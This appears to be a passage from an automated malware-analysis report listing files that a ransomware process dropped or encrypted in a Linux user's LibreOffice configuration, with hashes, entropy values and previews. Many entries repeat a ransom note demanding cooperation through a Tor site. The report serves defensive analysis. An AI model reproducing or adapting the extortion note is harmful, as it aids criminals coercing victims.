                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/swriter/images/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/swriter/menubar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/swriter/popupmenu/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/swriter/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/swriter/statusbar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/modules/swriter/toolbar/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/config/soffice.cfg/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/database/biblio.odb
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):2919
                  Entropy (8bit):7.861446691357785
                  Encrypted:false
                  SSDEEP:48:8tckM3tWOZ/5mixNAqopbPekAosn3KKBuveHdw6zT4uuk9zhHQn3+WhBDgT:8sWO+AxsPTFe9dBukDHcB3DgT
                  MD5:2F3450FB340399493BFF9A21D8D40DE6
                  SHA1:CC9BC933AC862999966DE5EEE43FF8A297A76301
                  SHA-256:8E7DBBEA421242F27A43AF18F4A13E64C972D60163C94FCEEA00E112C3D06C9D
                  SHA-512:F7676F939F77E774B286F1109C2C6DA58DFB2AD15F8C0FC2B29A5A32D2A29707EFD86FB8D307C92F3269379C2BFA4D48AED402AB1B506048670F09C7971B1A3A
                  Malicious:false
                  Reputation:low
                  Preview: ...'..,&?..E..7.^ua...C";.u.O.V..^[B&../"..v..."K+..:.......n...A..'WT.|.O......O...T...._...c.W[r.c ..<..)...ex..F.-...~..._W.;*+#e..c\>..JO.=[.Q.'..f".U..........g.....lez{9BL?.....m..QP....J...<.'(@...'..o....!..P$R.H1-...Y.`..g.=.)...;..<....8$..Yn.P.`.d.I..Ot..5!..tB..vW*.....9`...8.....p.Z.N..N4...@......Y.w.hD+Ev.... ......W..hA.,...*.t5.|....g......_..0..oz..*....h.......e....Y....fI......b.C..${..s|=...,.C..m`5G,.fV].RY.G..3..(c.,...p.....1.}c...g.a.zu.%..fX./..awC.?.H`..M..`.....6._..{B...F2.....J..)A......i...e...V.....R...,..tpr.5a.g...I.{..(....]-WLy.a.......>##.w,..X7.......G....T{Er,.{Vb; ..u.A..^.`...|..u.x..5_#..X.D...&........R...#.k...\f0.^...X.....dM..;B....R....f..~F{..Cc+..h.mr.*..c....`..e..V...3.........xo.f.}*+em.v;...NB'5.Ir._.......o.... ..]I0....n...S.3........t...n.v.L....;Q........N.".6G>.....{.X.w.,R.._.z**......N...1..).n...9V...s...'B..f.4Q5..`D.<.....t....>k.S.......}........^SBH.e.pw,,...Qe6......5... p.u....Q.=z........L.^.u......-. 0_...w&.. .a.u...
                  /home/user/.config/libreoffice/4/user/database/biblio/biblio.dbf
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):418682
                  Entropy (8bit):7.999545489097766
                  Encrypted:true
                  SSDEEP:12288:hFLeGTKSa5g95tOV6jOdKC5bMt9KH9WHK63Y:zeXVV6y5xdWK
                  MD5:16EC79B1674B2D6FE0C379F6E5094739
                  SHA1:D1B110D1659FD54F288159D52CC1162F90D4A342
                  SHA-256:3A3CDE622EFEC43B147EA7D31B79DE4AF33476731F0DBD835F940B7DB4734378
                  SHA-512:CAA5C4F5747C20BB66CD450A2E07B8F74FA507AA5074B2B568B0B0A48293185E282EE9F76765376D26524DC2012DAA28E85A03883A736523BB65A62644265467
                  Malicious:false
                  Reputation:low
                  Preview: .../fI...D.%..I$....$j2GT..\C..mr...yz|....?..$a.w.=.U...E/...YY>.E.......L......[3..0+5>.c.9Q.........(6.Vk..../...q...Yb.B..~..$...D.........VR....,d......N..7....!C...3..qq.......N. !If.|)1.+m..Y..F....O......2........><.%..N.mB...*)8.3S5j......a.~,..1.SjK5.N........1`/.'..;.Q.8..J!.,.@.Z...........@.C..g.......W;x.K......Z....'{..=...f.U.;..)p....VSp..?.M....A$6....G.6..1...g.........k..q..k.b...jp....:.._k.$..k.GK|e.fn9[.E.K.{/...h...L^I...+]....d.K.'..p.&....u..w......q....l....'Y.r.&........+.-p$....z..R.._..}s./....i)..as....h..Hk..5....N..!....9.w0.4'......X.J.@.;W.....JK..S..p..S....O.......&...l..S....tW.<...mu-....}..e.........L ..(.'........v}4s.is..`..V6<p...4<..[..\....B..$..&J.L....b.7..$..4..+).....=......^....;......$..........*;.).K....k...\Kb..gh.X....6.m].Y..$...w...tC.26...M...T.`.p.OcPe&....".-..eT>...)."P}....+..8...v.......Ws+..]6U..d....v.....<_.."0.......M.....[c.iY..T.v>.R.eS.....f.oU...O..n..)....O.3.....T...N...x.f~.X.*........2jS..J..}A....=..m1l.&&J0....
                  /home/user/.config/libreoffice/4/user/database/biblio/biblio.dbt
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):611057
                  Entropy (8bit):7.999711447132659
                  Encrypted:true
                  SSDEEP:12288:R0K2B/o3G7w3Q6Omse4FrE/YBjg93Zf2GCjRWby5l5LC18CcN:Ov0g6Odjr1Zg9pf2GCjRqy5lE18pN
                  MD5:5B21AE88C5AC3F851A546649D41579ED
                  SHA1:F3705EA0EB8F9C84AC2F02590918D702222D5100
                  SHA-256:C7E2709B949E40C512E09B960F6B0F17350259F800F98E02202EFE0DC5AAB6F5
                  SHA-512:5A8A50B80E49696092D79FA157D9DF4C82B04B0909105619291F109E30F8BACDE4506C44C00D8BF6782BBCA93812D9C387A5E776F7081AB6B9499F621A64C5BD
                  Malicious:false
                  Reputation:low
                  Preview: ..Z.$..0...W...&..UT.!.2|p......d...W..F..r..QS.Ek..M.......B.U...75B+R I.7......:.....(.....c..cS.=...+oaB=.3.5...Po..`Y.+n..E......|..g.Il..R.._.._f.+.4.................t.[..I...:.:.4..ut.3!R....f~r%........a..#..4..\e..h.53.......i..Dr|+.+..c..2g...|.b...J.9........$..+.............R,.4M..8........!..5];K+b..........G...K...PX...^.....m.XggY....V......]q..3K..:<....Wu{\.Y.EVO.1...c.......S.:..9+....20..I..o0.....Z......\Z...k..we..V.j....B.(...X..n.2X..D6.._.>....V.oo$..ZyT.......a..e..NJJ...P.h.^v. (....S$a......t.h..u.B.a...-tvD.......BE..e.b...Qq.urhIf..."..x*..djw...1V..8.8..._....j..+%j...P.1a.KK..}.I]96...~<..q..........Y..&)..-.a....ikA..d....2.T...`....d\.........G-c.....].....3...S.?B.$..qn.o.l&{..".=......w...........C....2..j.}..G....K.Us.........m..M...|.et..U....R.....t..lt.!.._t.....]!.t.s..jX..E.[....U....<......hX(M.......@.~....."!D....z..={.-B.......@@..Y..K.\..@......e.5.Q Z~qK....M]...T.......wK.....{u.#?Je.".....]...J..Iwl....@,.D.-.V/.|X)... .9...>$9.$B...]j.V.
                  /home/user/.config/libreoffice/4/user/database/biblio/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/database/evolocal.odb
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):3991
                  Entropy (8bit):7.902351849493704
                  Encrypted:false
                  SSDEEP:96:pmNtqLbNm6tPVXiJo6Id0ICALORw6ptSsZzEj90DJ:pQtqltPVXi+H0ItLOptEj29
                  MD5:D5AF0F30ADCFBB0E705DF12DCA1AF6EF
                  SHA1:E39934A4DA712F161369A050293DF9A129450D95
                  SHA-256:CC35F8D05206E1E26253C686781E38660540BD1F1AFD0DFEC77231FFAA1E4A62
                  SHA-512:E9A946109A9545692EB5A6024D9BC605AB17D280756F0840E9309A51B98CEE88D3AAA82099A89C3C7E64D955FC655ABA2DD16E82762209812DFE340A5BFEC898
                  Malicious:false
                  Reputation:low
                  Preview: ..t......h..t.../n.. ;...`2..7.GT.6...6...`......I#.......f....`R.Q".'..T...O....eKvt....d}......TE....q.u...v.B.rQ..hy.`....U...?.eC....C...H.#8...5....ub...F.Vq.=..\..REA.[|..Y...?..e.x[6}^Q,...m@...Y.>._...I...?.5.'!...p_.{.'L..2.....V.&........u^....v..|.1.O.'...$IOO.r.....Q...V^., ...5..g....P.[=....6=../?)6..".....d.Y?U..":..(..4...Q....1....3..$..........1..{.w*.H...,...(..]....c.H.GOE...;2..SK......^...%!..6..6...YaI3.@-........1cB..p..g>..r.......r.......@....~Kc.....%......:...K....$......pA...[N.N<13gB...2.[...)................Bs.#...y.$..\.1%.UL.K.m.A.O...5.G...../<r............-#..sL...t.B......D'.C.kjj.Z<M..N(m....k.y.1ZKt.....P........,..p_...R..........T'f.v.......Bh$.9.t;=..#y.....fy.....=.H.\.....N..?..6..k....N{/E.Aa:...I.}...Bb..V..>......j#...c.F..m.9...1O....U.>..liB ...M^.dh...i...P_e.qr....6.....u|df.F.....P.D?o..E.r.-..,....2........z....?...X;.......3.f.vJ..... CB.G....^.CUBJ.)wi....p.:8...Qpx.;u....I~....s.s9S..)..[.....7Hfu*a#....q6..@.fHM3B..&.1.zq.5{'.9..r
                  /home/user/.config/libreoffice/4/user/database/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/buildid
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):245
                  Entropy (8bit):5.044043142748648
                  Encrypted:false
                  SSDEEP:3:7Ez0ihEHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1WSmKtdTuq6mod/WKNUiEdvP:85S11zmhOO/EUyp6Xc0g7utdeK4X
                  MD5:E374F638A3BB7217C5A256695DA6D8FC
                  SHA1:C20F636A001CB05072428A4F4062A2F31857F376
                  SHA-256:D80051BD146D77F9B40D4E94B923D848674F5BFEE30B9F5C3A616458358DE3D2
                  SHA-512:6CFB2FA70FACB0B5937EEB4CEC7424330B303F04D3176841943010E2686B8DE4F5C2E2CB312F8535D0BE59309EDA31B6581D1F4B355329BFC40E792DADACA107
                  Malicious:false
                  Reputation:low
                  Preview: .8.1!}...t l.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................Xs7C/H.......vO......TY....uhfju....9................_.
                  /home/user/.config/libreoffice/4/user/extensions/bundled/lastsynchronized
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):233
                  Entropy (8bit):4.877358515555356
                  Encrypted:false
                  SSDEEP:3:ZHVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1EuaOgb+HfRhb94n:Z11zmhOO/EUyp6XcSu6b+HHG
                  MD5:93F41FFFA8F5066990E8DEA3B5501735
                  SHA1:ADD788B285776FA91777D70D1FDF87652C16BD35
                  SHA-256:84312E2243C51676F8511630BA2E56D3B8ACB3E39C30B3829B22C3A76DF20384
                  SHA-512:524911813B1F6DA273B964D05C701253B98DFC1402F80D1867EAA051B18791B15ED2FC04C3090CB859F91F5E2EE45F4EFDB981464E35862BF792215FAB55F789
                  Malicious:false
                  Reputation:low
                  Preview: .%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................D....KMR.f..k..v...:.v..[U.B.|.T....e.!)............
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.bundle.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.component.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/backenddb.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):367
                  Entropy (8bit):6.185578683141704
                  Encrypted:false
                  SSDEEP:6:twb586fXv9leHeTBgj3TlHasV1zmhOO/EUyp6XcdDlEIT7:tui6fXv4aGzTlHxr2DcUBOEIH
                  MD5:CE7F045507A3362E6B8D928B32468002
                  SHA1:52A8DE1A76F7C466184C24891995589190F93674
                  SHA-256:FAB72460A145782C25DB42EF6855FC4F00679F11F6AF006D5AF149AB983C9850
                  SHA-512:5BBD97139476DB62B34A34692CE478660CD159355F0C25B2F3EB921D9A748B7E0B9100603B05F15190BFC93099716B1C4B30FADDE44FC0DE57985D6EF28FB392
                  Malicious:false
                  Reputation:low
                  Preview: ..nz.k2'T...*.R.9..`...ad....4...........qBswR.[..c..z....&$...w.br.......:.0..6..N...M.'../.*NE.^\I.|0.UfEN^.)K.....K..)...o.-I.B...cK%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................8.........>?...j....gS.+....?..=.c.....F..6.........;.~.
                  /home/user/.config/libreoffice/4/user/extensions/bundled/registry/com.sun.star.comp.deployment.configuration.PackageRegistryBackend/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
